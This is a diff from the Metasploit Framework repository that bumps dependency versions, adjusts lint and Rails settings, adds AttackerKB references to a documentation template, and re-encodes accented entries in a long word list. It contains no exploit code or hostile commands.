automatic module_metadata_base.json update

Land #17458 , Weblogic t3s support
revert another get_once
2023-04-06 11:27:31 -05:00 · 2023-04-06 17:13:16 +01:00 · 2023-04-06 11:43:50 +01:00 · 2023-04-06 11:01:32 +01:00 · 2023-04-06 10:38:29 +01:00 · 2023-04-05 10:10:02 -05:00
260 changed files with 12869 additions and 2105 deletions
@@ -175,12 +175,13 @@ Lint/DeprecatedGemVersion:
  Exclude:
    - 'metasploit-framework.gemspec'

-Metrics/ClassLength:
+Metrics/ModuleLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
-  Enabled: true
-  Exclude:
-    - 'modules/**/*'
-    - 'test/modules/**/*'
+  Enabled: false
+
+Metrics/ClassLength:
+  Description: 'Most Metasploit classes are quite large. This is ok.'
+  Enabled: false

 Style/ClassAndModuleChildren:
  Enabled: false
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.5)
+    metasploit-framework (6.3.11)
      actionpack (~> 7.0)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -11,6 +11,7 @@ PATH
      bcrypt
      bcrypt_pbkdf
      bson
+      chunky_png
      dnsruby
      ed25519
      em-http-request
@@ -29,7 +30,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.113)
+      metasploit-payloads (= 2.0.122)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.20)
      mqtt
@@ -127,22 +128,22 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.707.0)
+    aws-partitions (1.722.0)
    aws-sdk-core (3.170.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.364.0)
+    aws-sdk-ec2 (1.368.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-iam (1.75.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.62.0)
+    aws-sdk-kms (1.63.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.119.0)
+    aws-sdk-s3 (1.119.1)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
@@ -154,8 +155,9 @@ GEM
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
+    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.2.0)
+    concurrent-ruby (1.2.2)
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
@@ -190,7 +192,7 @@ GEM
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
-    faraday-retry (2.0.0)
+    faraday-retry (2.1.0)
      faraday (~> 2.0)
    faye-websocket (0.11.1)
      eventmachine (>= 0.12.0)
@@ -215,7 +217,7 @@ GEM
    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
    io-console (0.6.0)
-    irb (1.6.2)
+    irb (1.6.3)
      reline (>= 0.3.0)
    jmespath (1.6.2)
    jsobfu (0.4.2)
@@ -249,7 +251,7 @@ GEM
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.113)
+    metasploit-payloads (2.0.122)
    metasploit_data_models (6.0.2)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -263,9 +265,9 @@ GEM
    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
    mini_portile2 (2.8.1)
-    minitest (5.17.0)
-    mqtt (0.5.0)
-    msgpack (1.6.0)
+    minitest (5.18.0)
+    mqtt (0.6.0)
+    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
@@ -279,7 +281,7 @@ GEM
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.14.1)
+    nokogiri (1.14.2)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
@@ -292,7 +294,7 @@ GEM
    packetfu (1.1.13)
      pcaprub
    parallel (1.22.1)
-    parser (3.2.0.0)
+    parser (3.2.1.1)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
@@ -302,7 +304,7 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.4.5)
+    pg (1.4.6)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
@@ -310,10 +312,10 @@ GEM
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
    public_suffix (5.0.1)
-    puma (6.0.2)
+    puma (6.1.1)
      nio4r (~> 2.0)
    racc (1.6.2)
-    rack (2.2.6.2)
+    rack (2.2.6.3)
    rack-protection (3.0.5)
      rack
    rack-test (2.0.2)
@@ -338,7 +340,7 @@ GEM
    recog (3.0.3)
      nokogiri
    redcarpet (3.6.0)
-    regexp_parser (2.6.2)
+    regexp_parser (2.7.0)
    reline (0.3.2)
      io-console (~> 0.5)
    rex-arch (0.1.14)
@@ -354,7 +356,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.37)
+    rex-exploitation (0.1.38)
      jsobfu
      metasm
      rex-arch
@@ -379,14 +381,14 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.47)
+    rex-socket (0.1.49)
      rex-core
    rex-sslscan (0.1.9)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.49)
+    rex-text (0.2.50)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -414,24 +416,24 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.12.0)
-    rubocop (1.44.1)
+    rubocop (1.48.0)
      json (~> 2.3)
      parallel (~> 1.10)
      parser (>= 3.2.0.0)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.24.1, < 2.0)
+      rubocop-ast (>= 1.26.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.24.1)
-      parser (>= 3.1.1.0)
+    rubocop-ast (1.27.0)
+      parser (>= 3.2.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
-    ruby-progressbar (1.11.0)
+    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.4)
+    ruby_smb (3.2.5)
      bindata
      openssl-ccm
      openssl-cmac
@@ -453,7 +455,7 @@ GEM
      rack (~> 2.2, >= 2.2.4)
      rack-protection (= 3.0.5)
      tilt (~> 2.0)
-    sqlite3 (1.6.0)
+    sqlite3 (1.6.1)
      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    strptime (0.2.5)
@@ -463,9 +465,9 @@ GEM
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.2.1)
-    tilt (2.0.11)
+    tilt (2.1.0)
    timecop (0.9.6)
-    timeout (0.3.1)
+    timeout (0.3.2)
    ttfunk (1.7.0)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
@@ -500,7 +502,7 @@ GEM
      webrick
    yard (0.9.28)
      webrick (~> 1.7.0)
-    zeitwerk (2.6.6)
+    zeitwerk (2.6.7)

 PLATFORMS
  ruby
@@ -152,7 +152,7 @@ Copyright: 2017 Yukihiro Matsumoto
 License: Ruby

 Files: lib/msf/core/modules/external/python/async_timeout/*
-Copyright: 2016-2017 Andrew Svetlov
+Copyright: 2016-2023 Andrew Svetlov
 License: Apache 2.0

 Files: lib/msf/core/web_services/public/*
@@ -227,7 +227,7 @@ Purpose: This module contains the source code for FUSE, which this module
 Files: modules/exploits/linux/local/ntfs3g_priv_esc.rb
 Copyright: 2017
 License: GPLv2
-Purpose: The Ruby file contains the text of several modules from exploit-db 
+Purpose: The Ruby file contains the text of several modules from exploit-db
         which it compiles and uploads to the target to elevate privileges.

 Files: modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb
@@ -239,7 +239,7 @@ Purpose: This module targets a vulnerability in Metasploit Framework versions
 Files: modules/exploits/windows/smb/ms04_007_killbill.rb
 Copyright: 2004, Solar Eclipse
 License: GPL
-Purpose: The module exploits the Windows ASN.1 vulnerability in Windows 2000 
+Purpose: The module exploits the Windows ASN.1 vulnerability in Windows 2000
         SP2-SP4 and Windows XP SP0-SP1. It contains code ported from a GPLv2
         module.

@@ -255,7 +255,7 @@ Purpose: This module allows us to create an x64 Windows messagebox payload.
 Files: modules/post/linux/dos/xen_420_dos.rb
 Copyright: 2016
 License: GPL
-Purpose: This module crashes the Xen 4.2.0 hypervisor when run in a 
+Purpose: This module crashes the Xen 4.2.0 hypervisor when run in a
         paravirtualized VM. It contains a short code section licensed through
         GPL.

@@ -10,12 +10,12 @@ afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.707.0, "Apache 2.0"
+aws-partitions, 1.722.0, "Apache 2.0"
 aws-sdk-core, 3.170.0, "Apache 2.0"
-aws-sdk-ec2, 1.364.0, "Apache 2.0"
+aws-sdk-ec2, 1.368.0, "Apache 2.0"
 aws-sdk-iam, 1.75.0, "Apache 2.0"
-aws-sdk-kms, 1.62.0, "Apache 2.0"
-aws-sdk-s3, 1.119.0, "Apache 2.0"
+aws-sdk-kms, 1.63.0, "Apache 2.0"
+aws-sdk-s3, 1.119.1, "Apache 2.0"
 aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
@@ -24,8 +24,9 @@ bson, 4.15.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
+chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.2.0, MIT
+concurrent-ruby, 1.2.2, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
@@ -44,7 +45,7 @@ factory_bot_rails, 6.2.0, MIT
 faker, 3.1.1, MIT
 faraday, 2.7.4, MIT
 faraday-net_http, 3.0.2, MIT
-faraday-retry, 2.0.0, MIT
+faraday-retry, 2.1.0, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
 filesize, 0.2.0, MIT
@@ -59,7 +60,7 @@ http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
 i18n, 1.12.0, MIT
 io-console, 0.6.0, "ruby, Simplified BSD"
-irb, 1.6.2, "ruby, Simplified BSD"
+irb, 1.6.3, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.6.3, ruby
@@ -70,16 +71,16 @@ memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.1, "New BSD"
 metasploit-credential, 6.0.2, "New BSD"
-metasploit-framework, 6.3.5, "New BSD"
+metasploit-framework, 6.3.11, "New BSD"
 metasploit-model, 5.0.1, "New BSD"
-metasploit-payloads, 2.0.113, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.122, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.2, "New BSD"
 metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.1, MIT
-minitest, 5.17.0, MIT
-mqtt, 0.5.0, MIT
-msgpack, 1.6.0, "Apache 2.0"
+minitest, 5.18.0, MIT
+mqtt, 0.6.0, MIT
+msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
@@ -90,7 +91,7 @@ net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.14.1, MIT
+nokogiri, 1.14.2, MIT
 nori, 2.6.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -98,17 +99,17 @@ openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.22.1, MIT
-parser, 3.2.0.0, MIT
+parser, 3.2.1.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.11.0, MIT
-pg, 1.4.5, "Simplified BSD"
+pg, 1.4.6, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
 public_suffix, 5.0.1, MIT
-puma, 6.0.2, "New BSD"
+puma, 6.1.1, "New BSD"
 racc, 1.6.2, "ruby, Simplified BSD"
-rack, 2.2.6.2, MIT
+rack, 2.2.6.3, MIT
 rack-protection, 3.0.5, MIT
 rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
@@ -120,13 +121,13 @@ rasn1, 0.12.1, MIT
 rb-readline, 0.5.5, BSD
 recog, 3.0.3, unknown
 redcarpet, 3.6.0, MIT
-regexp_parser, 2.6.2, MIT
+regexp_parser, 2.7.0, MIT
 reline, 0.3.2, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
 rex-core, 0.1.30, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.37, "New BSD"
+rex-exploitation, 0.1.38, "New BSD"
 rex-java, 0.1.6, "New BSD"
 rex-mime, 0.1.7, "New BSD"
 rex-nop, 0.1.2, "New BSD"
@@ -135,10 +136,10 @@ rex-powershell, 0.1.97, "New BSD"
 rex-random_identifier, 0.1.10, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.47, "New BSD"
+rex-socket, 0.1.49, "New BSD"
 rex-sslscan, 0.1.9, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.49, "New BSD"
+rex-text, 0.2.50, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
@@ -149,14 +150,14 @@ rspec-mocks, 3.12.3, MIT
 rspec-rails, 6.0.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.12.0, MIT
-rubocop, 1.44.1, MIT
-rubocop-ast, 1.24.1, MIT
+rubocop, 1.48.0, MIT
+rubocop-ast, 1.27.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
-ruby-progressbar, 1.11.0, MIT
+ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.4, "New BSD"
+ruby_smb, 3.2.5, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
@@ -164,15 +165,15 @@ simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
 sinatra, 3.0.5, MIT
-sqlite3, 1.6.0, "New BSD"
+sqlite3, 1.6.1, "New BSD"
 sshkey, 2.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
-tilt, 2.0.11, MIT
+tilt, 2.1.0, MIT
 timecop, 0.9.6, MIT
-timeout, 0.3.1, "ruby, Simplified BSD"
+timeout, 0.3.2, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2022.7, MIT
@@ -190,4 +191,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
 yard, 0.9.28, MIT
-zeitwerk, 2.6.6, MIT
+zeitwerk, 2.6.7, MIT
@@ -47,7 +47,7 @@ module Metasploit
      when "test"
        config.eager_load = false
      when "production"
-        config.eager_load = true
+        config.eager_load = false
      end

      if ActiveRecord.respond_to?(:legacy_connection_handling=)
@@ -117,6 +117,13 @@

 <%= normalize_pull_requests(items[:mod_pull_requests]) %>

+<%- attacker_kb_references = normalize_attackerkb_references(items[:mod_refs]) %>
+<% unless attacker_kb_references.empty? %>
+## AttackerKB references
+
+<%= attacker_kb_references %>
+<% end %>
+
 <% unless items[:mod_refs].empty? %>
 ## References

@@ -274,8 +274,8 @@ abbreviating
 abbreviation
 abby
 abbye
-abbé
-abbés
+abbé
+abbés
 abc
 abc123
 abcd
@@ -975,7 +975,7 @@ adipose
 adiposes
 adirondack
 adirondacks
-adiós
+adiós
 adj
 adjacency
 adjacent
@@ -1573,7 +1573,7 @@ aidan
 aide
 aide-de-camp
 aide-memoires
-aide-mémoire
+aide-mémoire
 aided
 aider
 aides-de-camp
@@ -3006,7 +3006,7 @@ animistic
 animized
 animosity
 animus
-animé
+animé
 anion
 anionic
 anise
@@ -3615,10 +3615,10 @@ applicator
 applier
 appliers
 applique
-appliqué
-appliquéd
-appliquéing
-appliqués
+appliqué
+appliquéd
+appliquéing
+appliqués
 apply
 appoint
 appointee
@@ -4274,8 +4274,8 @@ arvy
 aryan
 aryanism
 aryn
-arête
-arêtes
+arête
+arêtes
 as
 asa
 asama
@@ -4618,7 +4618,7 @@ asturias
 astute
 astuteness
 asuncion
-asunción
+asunción
 asunder
 aswan
 asyllabic
@@ -4643,7 +4643,7 @@ atalanta
 atamelang
 atari
 ataturk
-atatürk
+atatürk
 atavism
 atavist
 atavistic
@@ -4742,7 +4742,7 @@ attached
 attacher
 attaches
 attachment
-attaché
+attaché
 attack
 attackable
 attacker
@@ -6141,7 +6141,7 @@ bartolomeo
 barton
 bartram
 barty
-bartók
+bartók
 baruch
 barvale
 barvallen
@@ -7880,7 +7880,7 @@ blast
 blaster
 blasting
 blastoff
-blasé
+blasé
 blat
 blatancy
 blatant
@@ -8433,7 +8433,7 @@ bogotified
 bogotifies
 bogotify
 bogotifying
-bogotá
+bogotá
 bogus
 bogy
 bogyman
@@ -8911,7 +8911,7 @@ botulinum
 botulinus
 botulism
 boucher
-bouclé
+bouclé
 boudicca
 boudoir
 bouffant
@@ -8962,13 +8962,13 @@ bourne
 bournemouth
 bourree
 bourses
-bourée
+bourée
 boustrophedon
 bout
 boutique
 boutonniere
-boutonnière
-boutonnières
+boutonnière
+boutonnières
 bouvier
 bouzouki
 bovary
@@ -9052,7 +9052,7 @@ boyscout
 boysenberry
 boyup
 bozo
-boötes
+boötes
 bp
 bpi
 bpoe
@@ -9435,7 +9435,7 @@ bribery
 bribie
 bric
 bric-a-brac
-bric-à-brac
+bric-à-brac
 brice
 brick
 brick-red
@@ -10472,7 +10472,7 @@ buzzer
 buzzing
 buzzword
 buzzy
-buñuel
+buñuel
 bx
 bxs
 by
@@ -10528,10 +10528,10 @@ byway
 byword
 byzantine
 byzantium
-bêche
-bête
-bêtes
-bêtise
+bêche
+bête
+bêtes
+bêtise
 c
 c.elegans
 c.lit.
@@ -10646,8 +10646,8 @@ caffeinated
 caffeine
 caftan
 cafutweni
-café
-cafés
+café
+cafés
 cage
 caged
 cager
@@ -10962,8 +10962,8 @@ canalization
 canalize
 canalling
 canape
-canapé
-canapés
+canapé
+canapés
 canard
 canaries
 canary
@@ -13334,11 +13334,11 @@ chutzpahs
 chuvash
 chweni
 chyme
-château
-châteaus
-châteaux
-châtelaine
-châtelaines
+château
+châteaus
+châteaux
+châtelaine
+châtelaines
 ci
 cia
 ciao
@@ -13840,15 +13840,15 @@ clewer
 cliburn
 cliche
 cliched
-cliché
-clichéd
-clichés
+cliché
+clichéd
+clichés
 click
 clicker
 clicking
 client
 clientele
-clientèle
+clientèle
 cliff
 cliff-hanger
 cliffdale
@@ -13951,7 +13951,7 @@ clogged
 clogging
 cloisonne
 cloisonnes
-cloisonné
+cloisonné
 cloister
 cloistral
 clomp
@@ -14968,7 +14968,7 @@ communing
 communion
 communique
 communiques
-communiqué
+communiqué
 communise
 communism
 communist
@@ -15196,8 +15196,8 @@ computerize
 computes
 computicket
 computing
-compère
-compères
+compère
+compères
 comrade
 comradeliest
 comradeliness
@@ -15241,7 +15241,7 @@ concentrator
 concentric
 concentrically
 concepcion
-concepción
+concepción
 concept
 conception
 conceptional
@@ -15504,8 +15504,8 @@ confrontation
 confrontational
 confrontationally
 confronter
-confrère
-confrères
+confrère
+confrères
 confucian
 confucianism
 confucius
@@ -15755,8 +15755,8 @@ consolidation
 consolidator
 consoling
 consomme
-consommé
-consommés
+consommé
+consommés
 consonance
 consonances
 consonant
@@ -16539,8 +16539,8 @@ cortisone
 cortland
 cortney
 corty
-cortège
-cortèges
+cortège
+cortèges
 corundum
 coruscate
 coruscation
@@ -16657,8 +16657,8 @@ coulis
 coulomb
 coulter
 coulthard
-coulée
-coulées
+coulée
+coulées
 council
 councillor
 councilman
@@ -16791,7 +16791,7 @@ couples
 couplet
 coupling
 coupon
-coupé
+coupé
 cour
 courage
 courageous
@@ -17506,8 +17506,8 @@ crowning
 crows
 croydon
 crozier
-croûton
-croûtons
+croûton
+croûtons
 crt
 crucial
 cruciate
@@ -17526,7 +17526,7 @@ crude
 crudeness
 crudites
 crudity
-crudités
+crudités
 cruel
 cruelled
 cruelling
@@ -17634,12 +17634,12 @@ crystallographer
 crystallographic
 crystallography
 crystie
-crèche
-crèches
-crème
-crêpe
-crêpes
-crêpey
+crèche
+crèches
+crème
+crêpe
+crêpes
+crêpey
 cs
 csa
 cse
@@ -18113,7 +18113,7 @@ czechoslovakian
 czechs
 czerniak
 czerny
-côte
+côte
 d
 da
 daantjie
@@ -18299,7 +18299,7 @@ damson
 dan
 dana
 danarand
-danaë
+danaë
 danbury
 dance
 danceable
@@ -19951,8 +19951,8 @@ derrik
 derril
 derrinallum
 derringer
-derrière
-derrières
+derrière
+derrières
 derron
 derry
 dersley
@@ -20447,7 +20447,7 @@ diamagnetic
 diamante
 diamanthoogte
 diamantina
-diamanté
+diamanté
 diameter
 diametric
 diametrical
@@ -21077,8 +21077,8 @@ discordant
 discorporate
 discorporated
 discotheque
-discothèque
-discothèques
+discothèque
+discothèques
 discount
 discountability
 discountable
@@ -21613,9 +21613,9 @@ divisor
 divorce
 divorcee
 divorcement
-divorcé
-divorcée
-divorcées
+divorcé
+divorcée
+divorcées
 divot
 divulge
 divvy
@@ -22000,7 +22000,7 @@ dopiness
 dopinesses
 doping
 doppelganger
-doppelgänger
+doppelgänger
 doppies
 doppler
 dopy
@@ -22077,7 +22077,7 @@ dorthea
 dorthy
 dortmund
 dory
-doré
+doré
 dos
 dosage
 dose
@@ -22553,7 +22553,7 @@ drowse
 drowsily
 drowsiness
 drowsy
-droëwors
+droëwors
 dru
 drub
 drubbed
@@ -22948,7 +22948,7 @@ duynefontein
 dvd
 dvina
 dvorak
-dvorák
+dvorák
 dwaal
 dwaalboom
 dwain
@@ -23034,33 +23034,33 @@ dzimauli
 dzongkha
 dzumeri
 dzungaria
-début
-débutante
-débutantes
-débuts
-débâcle
-débâcles
-déclassé
-déclassée
-décolletage
-décolletages
-décolleté
-décolletée
-décor
-décors
-découpage
-déjà
-démodé
-dénouement
-dépaysé
-dépaysée
-dérailleur
-dérailleurs
-déshabillé
-détente
-détentes
-dürer
-düsseldorf
+début
+débutante
+débutantes
+débuts
+débâcle
+débâcles
+déclassé
+déclassée
+décolletage
+décolletages
+décolleté
+décolletée
+décor
+décors
+découpage
+déjà
+démodé
+dénouement
+dépaysé
+dépaysée
+dérailleur
+dérailleurs
+déshabillé
+détente
+détentes
+dürer
+düsseldorf
 e
 e-commerce
 e-mail
@@ -24137,7 +24137,7 @@ elysia
 elysian
 elysium
 elyssa
-elysée
+elysée
 em
 ema
 emabheleni
@@ -24869,8 +24869,8 @@ entreatingly
 entreaty
 entrechat
 entrecote
-entrecôte
-entrecôtes
+entrecôte
+entrecôtes
 entree
 entrees
 entremets
@@ -24880,8 +24880,8 @@ entrepot
 entrepreneur
 entrepreneurial
 entrepreneurship
-entrepôt
-entrepôts
+entrepôt
+entrepôts
 entries
 entropic
 entropy
@@ -24890,8 +24890,8 @@ entry
 entryphone
 entryphones
 entryway
-entrée
-entrées
+entrée
+entrées
 entshonalanga
 entshongwe
 entumbane
@@ -25442,7 +25442,7 @@ ester
 estera
 esterase
 esterhazy
-esterházy
+esterházy
 esterpark
 estes
 estevan
@@ -26239,8 +26239,8 @@ expository
 expostulate
 expostulation
 exposure
-exposé
-exposés
+exposé
+exposés
 expound
 expounder
 express
@@ -26493,7 +26493,7 @@ fab
 fabe
 faber
 faberge
-fabergé
+fabergé
 fabian
 fabiano
 fabians
@@ -27073,10 +27073,10 @@ fays
 fayth
 faythe
 faze
-façade
-façades
-faïence
-faïences
+façade
+façades
+faïence
+faïences
 fbi
 fcc
 fd
@@ -27438,10 +27438,10 @@ fi
 fia
 fiance
 fiancee
-fiancé
-fiancée
-fiancées
-fiancés
+fiancé
+fiancée
+fiancées
+fiancés
 fiann
 fianna
 fiasco
@@ -28051,10 +28051,10 @@ flambes
 flamboyance
 flamboyancy
 flamboyant
-flambé
-flambéed
-flambéing
-flambés
+flambé
+flambéed
+flambéing
+flambés
 flame
 flame-proof
 flame-proofed
@@ -29111,7 +29111,7 @@ fosterer
 fostering
 fotomat
 foucault
-fouché
+fouché
 fought
 foul
 foul-mouth
@@ -29306,14 +29306,14 @@ franticness
 frants
 franz
 franzen
-françois
-françoise
+françois
+françoise
 frap
 frappe
 frappeed
 frappeing
 frappes
-frappé
+frappé
 frasco
 fraser
 fraserburg
@@ -29993,11 +29993,11 @@ fy
 fyi
 fynbos
 fynnland
-fête
-fêtes
-föhn
-führer
-führers
+fête
+fêtes
+föhn
+führer
+führers
 g
 g-string
 g-strings
@@ -30428,8 +30428,8 @@ garwin
 garwood
 gary
 garza
-garçon
-garçons
+garçon
+garçons
 gas
 gas-permeable
 gasbag
@@ -31012,7 +31012,7 @@ gettysburg
 getup
 gewgaw
 gewurztraminer
-gewürztraminer
+gewürztraminer
 geysdorp
 geyser
 gezangave
@@ -31316,10 +31316,10 @@ glaciological
 glaciologist
 glaciology
 glacis
-glacé
-glacéed
-glacéing
-glacés
+glacé
+glacéed
+glacéing
+glacés
 glad
 gladded
 gladden
@@ -32726,11 +32726,11 @@ grus
 grusky
 gruyere
 gruyeres
-gruyère
+gruyère
 gryphon
 grysvok
-grâce
-grünewald
+grâce
+grünewald
 gs
 gsa
 gsm
@@ -33098,8 +33098,8 @@ gyromagnetic
 gyroscope
 gyroscopic
 gyve
-gödel
-göteborg
+gödel
+göteborg
 h
 h2opolo
 ha
@@ -33137,8 +33137,8 @@ habitualness
 habituate
 habituation
 habitue
-habitué
-habitués
+habitué
+habitués
 hacienda
 hack
 hackable
@@ -36618,7 +36618,7 @@ hysterical
 hystericism
 hyundai
 hz
-héloise
+héloise
 i
 i.e.
 ia
@@ -38232,8 +38232,8 @@ inguinal
 ingunna
 ingvar
 ingwavuma
-ingénue
-ingénues
+ingénue
+ingénues
 inhabit
 inhabitable
 inhabitance
@@ -39844,8 +39844,8 @@ jakey
 jakie
 jakob
 jalapeno
-jalapeño
-jalapeños
+jalapeño
+jalapeños
 jalopy
 jalousie
 jam
@@ -39963,8 +39963,8 @@ jarad
 jard
 jardine
 jardiniere
-jardinière
-jardinières
+jardinière
+jardinières
 jareb
 jared
 jarful
@@ -40579,7 +40579,7 @@ jostle
 jostling
 josue
 josy
-josé
+josé
 jot
 jotted
 jotter
@@ -41766,8 +41766,8 @@ kinder
 kindergarten
 kindergartener
 kindergartner
-kindergärtner
-kindergärtners
+kindergärtner
+kindergärtners
 kindest
 kindhearted
 kindheartedness
@@ -42434,8 +42434,8 @@ krystal
 krystalle
 krystle
 krystyna
-króna
-krónur
+króna
+krónur
 ks
 kshatriya
 kt
@@ -42926,7 +42926,7 @@ lamport
 lamppost
 lamprey
 lampshade
-lamé
+lamé
 lan
 lana
 lanae
@@ -44646,8 +44646,8 @@ littleness
 littleton
 litton
 littoral
-littérateur
-littérateurs
+littérateur
+littérateurs
 liturgic
 liturgical
 liturgics
@@ -44939,7 +44939,7 @@ lombard
 lombardi
 lombardy
 lome
-lomé
+lomé
 lon
 lona
 london
@@ -45496,7 +45496,7 @@ luminescent
 luminosity
 luminous
 luminousness
-lumière
+lumière
 lumku
 lummox
 lump
@@ -45655,7 +45655,7 @@ lychgate
 lycopodium
 lycra
 lycurgus
-lycée
+lycée
 lyda
 lydenburg
 lydia
@@ -45858,8 +45858,8 @@ macos
 macpaint
 macquarie
 macrame
-macramé
-macramés
+macramé
+macramés
 macro
 macrobiotic
 macrobiotics
@@ -46414,7 +46414,7 @@ mallala
 mallapunyah
 mallard
 mallarme
-mallarmé
+mallarmé
 malleability
 malleable
 malleableness
@@ -46696,7 +46696,7 @@ manorial
 manpower
 manque
 manquzu
-manqué
+manqué
 mans
 mansard
 manse
@@ -46758,10 +46758,10 @@ manzengwenya
 manzi
 manzibomvu
 manzimahle
-manège
-manèged
-manèges
-manèging
+manège
+manèged
+manèges
